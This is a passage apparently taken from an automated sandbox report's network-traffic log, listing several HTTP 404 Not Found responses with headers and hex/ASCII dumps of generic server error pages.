<a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></htm
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=a671d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=LaxDate: Sat, 19 Oct 2024 10:58:13 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=a673d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=LaxDate: Sat, 19 Oct 2024 10:58:16 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=a675d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=LaxDate: Sat, 19 Oct 2024 10:58:18 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=a674d5211e16a089760985ef782ea8; Path=/; HttpOnly; SameSite=LaxDate: Sat, 19 Oct 2024 10:58:21 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 19 Oct 2024 10:59:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a 